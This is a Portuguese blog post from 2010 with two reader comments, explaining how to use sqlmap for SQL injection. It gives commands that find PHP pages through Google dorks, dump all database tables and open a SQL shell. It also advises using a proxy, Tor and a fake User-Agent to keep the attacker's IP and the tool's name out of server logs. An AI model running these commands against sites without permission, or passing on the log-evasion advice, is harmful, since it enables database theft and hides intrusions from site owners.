quinta-feira, 30 de dezembro de 2010

Sqlmap - Testes de SQL Injection

O sqlmap é uma ferramenta para testes de SQL injection, com suporte a banco de dados MySql, Oracle, PostgreSQL e Microsoft SQL Server. Apenas vou demonstrar neste post alguns testes, essa ferramenta é muito poderosa e super flexível, recomendo a leitura do manual e do help (sqlmap -h).

Tem uma opção que acho fantástica, que é a busca por Google Dorks. Você informa o site onde você deseja realizar o teste e o dorks que você quer que o sqlmap use para buscar no site. O comando abaixo vai fazer com que o sqlmap faça uma busca no site informado por páginas em php e quando ele tiver uma lista considerável ele começa a tentar realizar os ataques.

#sqlmap -g “site:www.siteaqui.com.br ext:php”

Adicionando “--dump-all” ele fará um dump das tabelas do banco e mostrara também a versão do banco. O comando ficaria assim:

# sqlmap --dump-all  -g “site:www.siteaqui.com.br ext:php”

Um teste simples seria:

#sqlmap.py --dump-all -u "site.com.br"

Já pensou em conseguir uma Shell utilizando uma vulnerabilidade de Injection? Pois é, o sqlmap faz isso pra você:

#sqlmap --sql-shell -g “site:www.siteaqui.com.br ext:php”

Você pode realizar seus testes no site vulnerável da Acunetix que tem o propósito de testar suas habilidades e testar ferramentas:


Não se esqueça de usar algum Proxy para que o seu IP não seja registrado no log do servidor e mude também o “User-Agent” para que no log não apareça este campo como “sqlmap”. Para realizar isso execute o comando abaixo:

#sqlmap --sql-shell -g “site:www.siteaqui.com.br ext:php” --user-agent=”Mozilla/5.0” --proxy=”http://algumproxy.com:8080”

Faça uma busca pelo google e você encontrara uma lista de proxys ou use a rede TOR. Para mais informações sobre a rede TOR veja os links abaixo:


Veja esse ótimo vídeo sobre o Sqlmap:


by Osvaldo H Peixoto

2 comentários:

  1. Caraca velhinho, gostei muito...
    estou tentando encontrar algum tuto para usar o sqlmap e testar alguns sites de clientes meu mas não encontrei nenhum tuto completinho.

    Continuo com algumas duvidas, teria como você me ajudar? Sou novo na área e gostaria de saber melhor como suar o SQLMap...tipo..onde eu coloco esses códigos acima? em que arquivo da pasta sqlmap tem isso? em fim...um tuto mais para iniciantes mesmo...hehehe

    Abraços

    ResponderExcluir
  2. Primeiramente gostaria de agradecer pelo comentário :-)

    Eu sugiro que você aprofunde seu conhecimento na técnica de SQL Injection, leia tudo sobre o assunto, desta forma se torna fácil entender como funciona as ferramtenas que automatizam os ataques de SQLi. Segue alguns links abaixo para lhe ajudar:

    1 – Primeiro Paper sobre SQLi
    http://osvaldohp.blogspot.com/2011/01/sql-injection-aprenda-com-o-mestre.html

    2 - Lista de ferramentas
    http://osvaldohp.blogspot.com/2011/01/sql-injection-tools.html

    3 - Sql na prática
    http://osvaldohp.blogspot.com/2010/12/sql-injection-na-pratica.html

    4 – Videos do site oficial do sqlmap http://sqlmap.sourceforge.net/demo.html

    5 - Documento oficial sobre o sqlmap
    http://sqlmap.sourceforge.net/#docs

    Visite o site OWASP, porém no memento esta fora do ar.

    Qualquer dúvida.....

    ResponderExcluir